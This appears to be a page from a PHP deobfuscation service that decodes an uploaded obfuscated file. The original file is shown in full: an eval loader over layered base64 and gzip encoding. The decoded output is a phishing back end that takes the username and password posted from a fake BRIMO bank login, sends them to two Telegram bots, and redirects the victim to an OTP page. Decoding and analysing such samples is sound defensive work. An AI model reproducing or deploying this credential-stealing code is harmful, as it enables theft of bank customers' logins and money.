Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php //jangan di ubah ubah nanti eror $enc = '==QKQkxZyGkXIsj347t3HOQq0lKoGWg/hPhpg1LNS..
Decoded Output download
?>b'<?php
function sendMessage($token, $chatId, $message) {
$url = "https://api.telegram.org/bot$token/sendMessage";
$postFields = [
\'chat_id\' => $chatId,
\'text\' => $message
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
$result = curl_exec($ch);
/*
if(curl_errno($ch)) {
echo \'Curl error: \' . curl_error($ch);
}
else {
echo "Message sent to chat ID $chatId using bot $token
";
}
*/
curl_close($ch);
}
//kirim data dari web ke bot dengan method POST
$user = $_POST[\'user\'];
$password = $_POST[\'password\'];
include "token.php";
//Hasil Ress
$message = "
Notif Res BRIMO Login
===================
Username: ".$user."
Password: ".$password."
".$waktu."
===================
";
//CURL
include "curlbot.php";
//RESS
include "token.php";
sendMessage($tokenBot1, $chatId1, $message);
sendMessage($tokenBot2, $chatId2, $message);
header(\'Location: otp.php\');
?>
'
Did this file decode correctly?
Original Code
<?php
//jangan di ubah ubah nanti eror
$enc = '==QKQkxZyGkXIsj347t3HOQq0lKoGWg/hPhpg1LNShy5793Ve70r8+06O3tneJX6lPtTzfxj+yL/5iX89PHncHpr1Pjhb3pVDS6/fLHqsH04g7QObtBUUFHYZywqY5Eh4YfJSM7Wf/xHGdvyTqjZcMe6i7OB6w9kJ9efB5mL4aOmybOIswaI6jSqZd7tQibt6EhSiKZqHommYnR62Mo2CbZ7TCXMc7Qedbt7La4ieslhrLYnyFJ7UYSVUo5aOAsvDQIj/JYQS5B5ptTRRUFwUGfbKw0idExd++mZuRV/pr5DPEQlKp8hdRrPYy21GA5EJhbQHrjYeySL2PQelYK11HKCCARziCTG7yNEXTyxdXdD0NKGD612T+9CiGwA0yFTXF8aqpQrgOcq/i3U4vYJHO7xM154Ae0/cQW5nef8W9pj1iX8udZ4TByAX9Cm1mufMGvY8bDrfZDerfPA8NG1XmkFP1Kb6XPJpuRDhJTOJHihv69+T1Rsp+VCb+RKNHNg0gM2lCcv2jnpaFpYEJt2WesH7zV7joTIGa6iRTm2HiNjMvQCMUqEoMMtoyZnEAWKVq79bDv+B57xyrJaukkuAUtD0fpXDLSti6TlFFoWSKRpt1L98usbfzqfvtp5v15kHcZL6xT8JObv/HtwBvDsdbMLYmstD17ToWJbTUZbyld7fgWSWgIRY8H5P4HEAJ+afTVjciX/wLwDBwJe9XuAaEQ/gLwHB0/2CQSA';
eval(base64_decode(base64_decode('WlhaaGJDZ2lQejRpTG1kNmRXNWpiMjF3Y21WemN5aG5lblZ1WTI5dGNISmxjM01vWjNwcGJtWnNZWFJsS0dkNmFXNW1iR0YwWlNobmVtbHVabXhoZEdVb1ltRnpaVFkwWDJSbFkyOWtaU2h6ZEhKeVpYWW9KR1Z1WXlrcEtTa3BLU2twT3c9PQ=========')));exit;
?>
Function Calls
strrev | 1 |
gzinflate | 3 |
gzuncompress | 2 |
base64_decode | 3 |
Stats
MD5 | 3bdf287aad32f5e664d01995fa5f1795 |
Eval Count | 2 |
Decode Time | 55 ms |